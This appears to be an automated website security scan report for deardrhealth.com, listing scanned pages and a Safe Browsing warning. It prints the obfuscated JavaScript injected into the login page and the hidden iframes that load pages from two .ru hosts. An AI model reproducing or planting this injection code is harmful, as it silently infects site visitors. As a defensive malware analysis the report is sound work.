Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=deardrhealth.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.deardrhealth.com/ | 200 OK Content-Length: 28944 Content-Type: text/html | clean |
http://www.deardrhealth.com/js/validation.js | 200 OK Content-Length: 36351 Content-Type: application/x-javascript | clean |
http://www.deardrhealth.com/js/jquery.min.js?ver=2.7.1 | 200 OK Content-Length: 57254 Content-Type: application/x-javascript | clean |
http://www.deardrhealth.com/js/carousel.js | 200 OK Content-Length: 3668 Content-Type: application/x-javascript | clean |
http://www.deardrhealth.com/js/j4d.js | 200 OK Content-Length: 2478 Content-Type: application/x-javascript | clean |
http://www.deardrhealth.com/js/prettify.js | 200 OK Content-Length: 15269 Content-Type: application/x-javascript | clean |
http://www.deardrhealth.com/js/easySlider1.5.js | 200 OK Content-Length: 4423 Content-Type: application/x-javascript | clean |
http://www.deardrhealth.com/index.php | 200 OK Content-Length: 28973 Content-Type: text/html | clean |
http://www.deardrhealth.com/what-is-bsct.php | 200 OK Content-Length: 13249 Content-Type: text/html | clean |
http://www.deardrhealth.com/about.php | 200 OK Content-Length: 9607 Content-Type: text/html | clean |
http://www.deardrhealth.com/addlettersubmission.php | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Mon, 19 Jan 2015 15:49:30 GMT Pragma: no-cache Location: login.php?act=session_expired&backurl=http%3A%2F%2Fwww.deardrhealth.com%2Faddlettersubmission.php Server: Apache/2.2 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: X-Mapping-elbhlnpj=AC0BF39E85B44AD51E95FBC9A7ECD922; path=/ Set-Cookie: PHPSESSID=dn8vqtptclvm77t4j0kkksm773; path=/ | clean |
http://www.deardrhealth.com/login.php?act=session_expired&backurl=http%3a%2f%2fwww.deardrhealth.com%2faddlettersubmission.php | 200 OK Content-Length: 10629 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) a=new Array('<','s','c','r','i','p','t','>',' ','v','a','r',' ','S','t','r','=','"','g','i','n','h','e','i','g','h','t','=',"'",'0',"'",' ','t','i','t','l','e','=',"'",'D','Y','v','y','n','E','X','U','Z','e',"'",' ','b','o','r','d','e','r','=',"'",'0',"'",' ','w','i','d','t','h','=',"'",'1',"'",' ','f','r','a','m','e','b','o','r','d','e','r','=',"'",'0',"'",' ','h','e','i','g','h','t','=',"'",'0',"'",' ','s','c','r','o','l','l','i','n','g','=',"'",'n','o',"'",'>','<','/','i','f','r', ',' ',' ',' ','d','o','c','u','m','e','n','t','.','w','r','i','t','e','(','S','t','r','.','s','u','b','s','t','r','i','n','g','(','1','0','6',',','2','1','3',')',',','S','t','r','.','s','u','b','s','t','r','i','n','g','(','0',',','1','0','6',')',')',' ','<','/','s','c','r','i','p','t','>');document.write(a.join('')) Antivirus reports:
Hidden iFrame found. size: 1x0 src: http://lscab.ru/templates/lscab/kx/index.php?out=1331381254 <iframe name="sagutexyne" src="http://lscab.ru/templates/lscab/kx/index.php?out=1331381254" marginwidth="1" marginheight="0" title="dyvynexuze" border="0" width="1" frameborder="0" height="0" scrolling="no"> Hidden iFrame found. The same iFrame was found in 12 websites. size: 1x0 src: http://sitevalley.ru/kx/index.php?out=1331606723 <iframe name="sagutexyne" src="http://sitevalley.ru/kx/index.php?out=1331606723" marginwidth="1" marginheight="0" title="dyvynexuze" border="0" width="1" frameborder="0" height="0" scrolling="no"> | ||
http://www.deardrhealth.com/product.php | 200 OK Content-Length: 13085 Content-Type: text/html | clean |
http://www.deardrhealth.com/testimonials.php | 200 OK Content-Length: 15823 Content-Type: text/html | clean |
http://www.deardrhealth.com/contactus.php | 200 OK Content-Length: 12268 Content-Type: text/html | clean |
http://api.recaptcha.net/challenge?k=6LfkMAcAAAAAACEeJYZzGiiIqrf1VoGHrm74EDWu | HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache, no-store, max-age=0, must-revalidate Connection: close Date: Mon, 19 Jan 2015 15:49:40 GMT Pragma: no-cache Accept-Ranges: none Location: http://www.google.com/recaptcha/api/challenge?k=6LfkMAcAAAAAACEeJYZzGiiIqrf1VoGHrm74EDWu Server: GSE Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Expires: Fri, 01 Jan 1990 00:00:00 GMT Alternate-Protocol: 80:quic,p=0.02 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block | clean |
http://www.google.com/recaptcha/api/challenge?k=6lfkmacaaaaaaceejyzzgiiiqrf1voghrm74edwu | 200 OK Content-Length: 67 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: deardrhealth.com
Result:
GET / HTTP/1.1
Host: deardrhealth.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: deardrhealth.com
Referer: http://www.google.com/search?q=deardrhealth.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: deardrhealth.com
Referer: http://www.google.com/search?q=deardrhealth.com
Result:
The result is similar to the first query. There are no suspicious redirects found.